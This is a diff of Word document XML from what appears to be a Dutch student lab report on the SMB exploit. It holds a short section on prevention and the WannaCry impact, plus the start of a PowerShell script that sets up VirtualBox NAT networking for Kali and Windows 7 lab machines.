+          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Hoe de exploit </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>voorkomen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Het voor de hand liggende antwoord vandaag is het updaten van machines die SMB lopen. Zeker gezien de grote media-aandacht van de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is er vlug een fix uitgebracht.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Echter, voor het publiek bekend raken van de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> waren alle Windows-computers met standaard configuratie kwetsbaar voor deze </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>!</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Dit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is ook de reden waarom de NSA deze </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> jaren voor zichzelf hield en misbruikte, en is ook waarom </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> zoals </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>WannaCry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> zo’n impact had.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Bijlagen</w:t>
       </w:r>
     </w:p>
@@ -2295,6 +3490,3066 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Bijlage A: Configuratie Kali</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
+          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Bijlage B: Setup script</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Variables</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>$KALI_VM = '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kali_NPE</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>$WINDOWS_7_VM = 'Windows_7_NPE'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>$RAM = '2048'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>$CPU = '2'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>$VRAM = '128'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>natNPECV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Append VirtualBox’s installation directory to the PATH environment variable to make things easier</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Env:Path</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> += ";C:\Program Files\Oracle\VirtualBox\"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>#------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># 1. Setup Nat Network</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>#------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Stop DHCP server process if it's running</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dhcpProcess</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = Get-Process -Name </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxDHCP</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ErrorAction</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>SilentlyContinue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>if ($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dhcpProcess</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Write-Host "Stopping VirtualBox DHCP server..."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Stop-Process -Name </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxDHCP</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -Force</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Start-Sleep -Seconds </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>2  #</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Wait for the process to terminate</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Remove existing NAT network if needed</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t># Check if the NAT network exists</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">if (VBoxManage.exe </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>natnetwork</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> list | Select-String -Pattern $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t># If it exists, remove it</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">VBoxManage.exe </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>natnetwork</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> remove --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>netname</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>Write-Output "NAT network '$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>' removed successfully."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>} else {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t># If it doesn't exist, print a message</w:t>
+      </w:r>
+    </w:p>
